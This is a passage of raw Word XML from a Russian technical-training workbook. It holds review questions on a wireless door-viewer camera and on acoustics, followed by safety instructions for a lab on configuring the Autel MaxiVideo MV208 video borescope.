          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Инструкция пользователя – 1 шт.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="008C5DFE" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Контрольные вопросы для защиты практической работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Что входит в комплектацию </w:t>
      </w:r>
      <w:r w:rsidRPr="008C5DFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>беспроводно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>го</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5DFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5DFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>идеоглазк</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5DFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Radio DVR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Какие особенности данного устройства вы знаете?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Поясните принцип действия б</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5DFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>еспроводно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>го</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5DFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> цветно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>го</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5DFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> видеоглаз</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ка</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5DFE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Radio DVR»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD712C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc3808625"/>
      <w:r>
        <w:t>Вопросы для защиты  работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Вопрос 1. Линейные характеристики звукового поля;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Вопрос 2. Энергетические характеристики звукового поля;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Вопрос 3. Плоская и сферическая волны;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Вопрос 4. Акустические и электрические уровни (П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00AB23A4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc508055967"/>
      <w:bookmarkStart w:id="58" w:name="_Toc3808626"/>
      <w:r w:rsidRPr="00AB23A4">
        <w:t>Практическая работа №</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB23A4">
        <w:t>3</w:t>
      </w:r>
      <w:bookmarkStart w:id="59" w:name="_Toc508055968"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB23A4">
        <w:t>Видеоэндоскоп MaxiVideo MV208</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00AB23A4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD158C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>провести настройку видеоскопа MaxiVideo MV208</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00EC7BBF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_bookmark0"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Указания по технике</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>безопасности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ВАЖНО! Для предотвращения поражений электрическим током, возгораний, несчастных случаев и материального ущерба внимательно прочитайте данное руководство пользователя и соблюдайте, содержащиеся в нем указания по технике</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_bookmark1"/>
      <w:bookmarkEnd w:id="61"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Безопасность рабочей</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>зоны</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Выполняйте проверку автомобилей в безопасной</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>обстановке.</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Соблюдайте чистоту и обеспечьте хорошее освещение в рабочей зоне. Беспорядок на рабочем месте и плохое освещение могут стать причиной несчастных случаев.</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допускайте соприкосновений одежды, волос, рук, инструментов, испытательного оборудования и т. п. с подвижными и горячими частями</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>двигателя.</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Видеоскоп должен использоваться в хорошо проветриваемой рабочей</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>зоне.</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Запрещается использовать видеоскоп во взрывоопасных средах, содержащих, например, огнеопасные пары жидкостей, газы или частицы</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>пыли.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Используйте огнетушитель, который подходит для тушения возгораний бензина, химических реактивов и</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>электропроводки.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используйте видеоскоп вблизи коррозионно-активных химических веществ, способных ухудшить качество</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>фотоснимков.</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lastRenderedPageBreak/>
        <w:t>Во время использования видеоскопа не допускайте посторонних лиц в рабочую зону.</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Оберегайте видеоскоп от попаданий на него воды, топлива и смазки. Храните видеоскоп в сухом и чистом месте. В случае необходимости очистки внешних поверхностей видеоскопа используйте чистую ткань, смоченную в неагрессивном моющем</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>средстве.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_bookmark2"/>
      <w:bookmarkEnd w:id="62"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Меры предосторожности при работе с</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>электрооборудованием</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Избегайте контакта с заземленными поверхностями, например, трубопроводов, радиаторов, кухонных плит и</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>холодильников.</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подвергайте видеоскоп воздействию дождевых осадков или высокой влажности. Попадание воды внутрь видеоскопа может повредить электрические</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>схемы.</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Обращайтесь с кабелем электропитания надлежащим образом. Никогда не используйте кабель электропитания для переноски, перемещения или отсоединения видеоскопа. Запрещается располагать кабель электропитания вблизи источников тепла, емкостей с маслом, острых предметов или подвижных</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>частей.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Если видеоскоп должен использоваться в условиях повышенной влажности, источник электропитания необходимо защитить с помощью устройства защитного отключения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_bookmark3"/>
      <w:bookmarkEnd w:id="63"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Личная</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>безопасность</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Запрещается пользоваться видеоскопом, находясь в состоянии переутомления или под влиянием наркотиков, алкоголя или сильнодействующих медикаментов. Потеря сознания или психо-эмоциональной концентрации может привести к серьезным травмам.</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отдаляйтесь от видеоскопа слишком далеко. Постоянно находитесь в устойчивом положении и равновесии. Нахождение в устойчивом положении и равновесии помогает лучше контролировать видеоскоп при возникновении непредвиденных</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>ситуаций.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Всегда используйте средства защиты глаз, соответствующие стандартам</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>ANSI.</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Во время использования видеоскопа запрещается ношение одежды свободного покроя и ювелирных украшений. Держите волосы, одежду и перчатки вдали от подвижных частей. Одежда свободного покроя, ювелирные украшения и длинные волосы могут зацепиться о подвижные части</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>механизмов.</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Запрещается размещать видеоскоп на неустойчивых или подвижных поверхностях. Падение видеоскопа может серьезно травмировать технический персонал или повредить данный диагностический</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>прибор.</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допускайте попадания жидкостей на дисплей видеоскопа. Жидкости повышают вероятность поражения электрическим током и опасность повреждения данного диагностического</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:t>прибора.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используйте видеоскоп в личных или медицинских целях каким-либо образом.</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lastRenderedPageBreak/>
        <w:t>Видеоскоп не является ударопрочным. Запрещается ронять видеоскоп или использовать его в качестве</w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F75CB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>молотка.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_bookmark4"/>
      <w:bookmarkEnd w:id="64"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Описание, технические характеристики и компоненты</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>видеоскопа</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00136EFB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_bookmark5"/>
      <w:bookmarkEnd w:id="65"/>
      <w:r w:rsidRPr="00136EFB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Описание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="005D4582" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D4582">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цифровой видеоскоп Autel MaxiVideo</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4582">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
